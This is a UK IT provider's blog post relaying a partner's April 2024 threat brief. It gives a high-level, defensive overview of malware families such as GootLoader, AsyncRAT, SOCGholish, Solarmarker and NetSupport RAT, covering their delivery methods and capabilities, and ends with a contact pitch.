Common cyber threats to be aware of
Our partner ConnectWise who we work with to bring enterprise level cyber protection products to the UK market. ConnectWise provide products that fit our Shield of protection layered approach to Cyber Protection
ConnectWise bring us a monthly brief on current threats, We want to highlight the sheer amount threats that are out there, remember these are just the top threats and not all the threats.
These are the top Malware risks from April 2024, if you need support we are only a phone call away.
+44 (0) 113 532 5377
info@nexclowd.com
Gootloader
GootLoader is a first-stage loader that has been around since 2020, typically paired with the banking trojan GootKit. Like GhostPulse, GootLoader primarily uses SEO poisoning (T1608.006) to trick their victims into downloading malicious files. The GootLoader campaigns we have observed specifically target law firms, impersonating legal documents such as contracts, subpoenas, or other legal forms (see file names in IOCs below). GootLoader payloads are typically hosted on compromised WordPress sites. SEO poisoning is a common technique, and we strongly recommend not downloading any files from unknown sources.
AsyncRAT
AsyncRAT, short for Asynchronous Remote Administration Tool, is an open-source remote access tool built in C# that is available on Github. It is a legitimate admin tool designed to help IT remotely monitor and control other computers through a secure encrypted connection. It has a robust plugin system and includes features such as client screen viewing, recording, and keylogging.
As a free, open-source tool, several threat actors have been using AsyncRAT for their command and control (C2), establishing a secure connection to the threat actor’s C2 server where they can then use it to steal passwords or deploy additional tools, such as ransomware.
FakeUpdates/SOCGholish
SOCGholish, also known as FakeUpdate(s), is a downloader written in JavaScript that lures victims into downloading malware by pretending to be a software update. It typically relies on [T1189] Drive-by Compromise for [TA0001] Initial Access. As a downloader, its primary purpose is to download other malware, and it has been used to download and deploy Dridex, NetSupport, DoppelPaymer, and others. More specifically, we have recently observed a number of SOCGholish infections downloading NetSupport RAT (see below) during April 2024.
Solarmarker/Jupyter
Solarmarker, also known as Jupyter, Polazert, and Yellow Cokatoo, is a family of malware known for info stealing and its backdoor capabilities. Solarmarker is an infostealer known for stealing passwords and credit card information from its victims’ browsers. It also has command and control (C2) capabilities, such as file transfer and remotely executing commands. Solarmarker is primarily distributed by convincing users to download a malicious file using SEO poisoning (T1608.006). Some recent incidents involve downloading an LNK file (T1204.002) that executes malicious Powershell (T1059.001).
Recent versions of Solarmarker have been using an Autodesk installer. Most of the initial files downloaded include some version of “installer-package.exe”—though the actual filename may vary. Often, a user will download Solarmarker attempting to download a non-malicious, legitimate application, such as a PDF editor. The initial dropper will launch a legitimate installer of the application it is masquerading (T1036) while the malware installs in the background.
NetSupport RAT
NetSupport Manager is a legitimate remote-control utility first released in 1989. The legitimate application has been modified and repurposed by malicious threat actors and was renamed NetSupport RAT. It supports file transfers, chat with support, inventory management, and remote-control access. Threat actors will commonly attempt to repurpose legitimate tools for nefarious purposes as a [TA0005] Defense Evasion tactic.
Summary
In summary there are many cyber threats that bad actors are deploying to get your money, data, when in they also often leave a backdoor to re-enter at a later time to continue!